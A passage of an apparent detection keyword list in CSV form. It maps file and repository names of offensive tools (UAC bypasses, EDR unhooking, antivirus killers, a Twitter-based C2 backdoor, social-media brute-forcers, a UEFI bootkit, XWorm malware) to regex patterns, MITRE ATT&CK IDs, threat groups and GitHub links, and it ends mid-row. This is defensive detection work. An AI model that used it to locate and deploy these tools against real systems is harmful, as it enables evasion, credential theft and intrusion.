"*/tweetshell.sh*",".{0,1000}\/tweetshell\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","N/A","7","10","3581","391","2024-09-02T19:15:22Z","2019-03-28T18:07:05Z","12180" "*/twittor.git*",".{0,1000}\/twittor\.git.{0,1000}","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","N/A","10","10","771","217","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z","12181" "*/uac.py*",".{0,1000}\/uac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12182" "*/uac_bypass.py*",".{0,1000}\/uac_bypass\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","12183" "*/uac_cmstp.py*",".{0,1000}\/uac_cmstp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12184" "*/uac_compmgmtlauncher.py*",".{0,1000}\/uac_compmgmtlauncher\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12185" "*/uac_computerdefaults.py*",".{0,1000}\/uac_computerdefaults\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12186" "*/uac_dll_cliconfg.py*",".{0,1000}\/uac_dll_cliconfg\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12187" "*/uac_dll_mcx2prov.py*",".{0,1000}\/uac_dll_mcx2prov\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12188" "*/uac_dll_migwiz.py*",".{0,1000}\/uac_dll_migwiz\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12189" "*/uac_dll_sysprep.py*",".{0,1000}\/uac_dll_sysprep\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12190" "*/uac_dotnet.py*",".{0,1000}\/uac_dotnet\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12191" 
"*/uac_eventviewer.py*",".{0,1000}\/uac_eventviewer\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12192" "*/uac_fodhelper.py*",".{0,1000}\/uac_fodhelper\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12193" "*/uac_mockdir.py*",".{0,1000}\/uac_mockdir\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12194" "*/uac_perfmon.py*",".{0,1000}\/uac_perfmon\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12195" "*/uac_runas.py*",".{0,1000}\/uac_runas\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - 
T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12196" "*/uac_sdclt.py*",".{0,1000}\/uac_sdclt\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12197" "*/uac_sdcltcontrol.py*",".{0,1000}\/uac_sdcltcontrol\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12198" "*/uac_sdcltisolatedcommand.py*",".{0,1000}\/uac_sdcltisolatedcommand\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12199" "*/uac_silentcleanup.py*",".{0,1000}\/uac_silentcleanup\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12200" "*/uac_slui.py*",".{0,1000}\/uac_slui\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12201" "*/uac_token_manipulation.py*",".{0,1000}\/uac_token_manipulation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12202" "*/uac_wsreset.py*",".{0,1000}\/uac_wsreset\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12203" "*/UAC-BOF-Bonanza.git*",".{0,1000}\/UAC\-BOF\-Bonanza\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","12204" 
"*/UACBypass.dll*",".{0,1000}\/UACBypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12205" "*/UAC-Bypass.ps1*",".{0,1000}\/UAC\-Bypass\.ps1.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","1","N/A","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","12206" "*/UACBypasses/*",".{0,1000}\/UACBypasses\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","12207" "*/UacInfo64.exe*",".{0,1000}\/UacInfo64\.exe.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","1","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","12208" "*/UACME.git*",".{0,1000}\/UACME\.git.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense 
Evasion","https://github.com/hfiref0x/UACME","1","1","N/A","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","12209" "*/UAC-SilentClean/*",".{0,1000}\/UAC\-SilentClean\/.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","12210" "*/UAC-TokenMagic.ps1*",".{0,1000}\/UAC\-TokenMagic\.ps1.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access 
Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","1","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","12211" "*/uberfile.py*",".{0,1000}\/uberfile\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","12212" "*/ubiquiti-discovery.nse*",".{0,1000}\/ubiquiti\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12213" "*/udmp-parser.git*",".{0,1000}\/udmp\-parser\.git.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","12214" "*/UefiShell.iso*",".{0,1000}\/UefiShell\.iso.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - 
TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","12215" "*/umeshshinde19/instainsane*",".{0,1000}\/umeshshinde19\/instainsane.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","N/A","7","7","655","371","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z","12216" "*/UnconstrainedDelegationCheck .ahk*",".{0,1000}\/UnconstrainedDelegationCheck\s\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","12217" "*/unDefender.exe*",".{0,1000}\/unDefender\.exe.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","12218" "*/unDefender.git*",".{0,1000}\/unDefender\.git.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","12219" "*/undertheradar.git*",".{0,1000}\/undertheradar\.git.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","12220" "*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","N/A","10","10","1109","180","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z","12221" "*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/unhook-bof","1","1","N/A","N/A","10","10","57","16","2022-03-13T15:57:10Z","2021-07-02T14:55:38Z","12222" "*/unhook-bof*",".{0,1000}\/unhook\-bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/unhook-bof","1","1","N/A","N/A","10","10","268","59","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z","12223" "*/UnhookingPatch.git*",".{0,1000}\/UnhookingPatch\.git.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","12224" "*/UnhookingPatch.git*",".{0,1000}\/UnhookingPatch\.git.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","12225" "*/UnhookNTDLL.ahk*",".{0,1000}\/UnhookNTDLL\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and 
testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","12226" "*/unicorn.git*",".{0,1000}\/unicorn\.git.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","12227" "*/unicorn.py*",".{0,1000}\/unicorn\.py.{0,1000}","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","N/A","10","3818","816","2024-01-24T20:02:33Z","2013-06-19T08:38:06Z","12228" "*/unittest.nse*",".{0,1000}\/unittest\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
